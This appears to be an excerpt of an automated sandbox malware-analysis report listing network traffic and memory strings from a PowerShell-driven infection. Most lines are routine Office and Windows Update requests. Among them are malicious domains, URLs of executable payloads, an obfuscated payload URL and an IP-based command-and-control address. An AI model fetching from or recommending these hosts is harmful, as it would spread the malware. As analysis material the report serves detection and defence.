Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=45VhsCwYtemOw1F&MD=6sXZbsPr HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 | Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic DNS traffic detected: DNS query: bemostake.space
Source: global traffic DNS traffic detected: DNS query: rocketdocs.lol
Source: global traffic DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bemostake.space
Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0FBB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://rocketdocs.lol
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1550976753.0000018C260CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: OpenWith.exe, 0000000B.00000003.1758526956.000001BD8757E000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1808084063.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1635724874.000001BD8757B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758398905.000001BD87572000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1789392969.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758526956.000001BD8758D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exeHtj
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24Ht
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0EC72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rocketdocs.lol/utox_x86.exe
Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rockp24tdocs.lol/utox_x86.p24xp24
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 55063 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52232 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55193
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55194
Source: unknown Network traffic detected: HTTP traffic on port 54654 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52633 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53569 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 54975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 52220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 52186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 54287 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 56388 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55704 -> 443
